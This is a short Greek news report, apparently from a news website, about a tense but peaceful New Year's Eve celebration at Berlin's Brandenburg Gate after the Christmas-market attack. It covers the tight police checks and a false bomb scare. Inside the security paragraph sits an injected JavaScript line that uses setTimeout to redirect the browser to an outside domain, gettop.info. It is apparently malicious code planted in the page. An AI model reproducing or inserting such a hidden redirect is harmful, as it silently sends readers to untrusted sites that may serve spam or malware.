«Παγωμένη» η πρωτοχρονιάτικη εκδήλωση στο Βερολίνο

0
6

 

Ήρεμα κύλησε το βράδυ στο Βερολίνο αν και ελαφρώς παγωμένο έπειτα από την τρομοκρατική επίθεση στη χριστουγεννιάτικη αγορά της πόλης με 12 νεκρούς. Αναστάτωση προκλήθηκε όταν ένας επισκέπτης φώναξε πριν από τα μεσάνυχτα «βόμβα, βόμβα», κάτι που αποδίδεται από την αστυνομία σε μεθυσμένο ταραχοποιό ενώ κάποιες μικροσυμπλοκές σημειώθηκαν στις συνοικίες. Ωστόσο, οι Βερολινέζοι δεν θέλησαν να αφήσουν το κλίμα τρομοκρατίας να τους κρατήσει στα σπίτια τους κι έτσι συνέρρευσαν στο πολύχρωμο και γιγαντιαίο πάρτι γύρω από την Πύλη του Βραδενβούργου.

Όλοι οι δρόμοι οδηγούσαν ήδη από το απόγευμα του Σαββάτου προς την Πύλη του Βραδενβούργου και τη Στήλη της Νίκης, τα δύο άκρα της λεωφόρου της 16ης Ιουνίου, όπου θα γινόταν το παραδοσιακό πρωτοχρονιάτικο πάρτι της γερμανική πρωτεύουσας.

Ο έλεγχος των αστυνομικών και της περιφρούρησης ήταν εξονυχιστικός. Είχαν απαγορευτεί τσάντες, σακίδια και βαλίτσες κάθε τύπου, όπως επίσης και η μεταφορά και ιδιωτική χρήση πυροτεχνημάτων στον συγκεκριμένο χώρο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here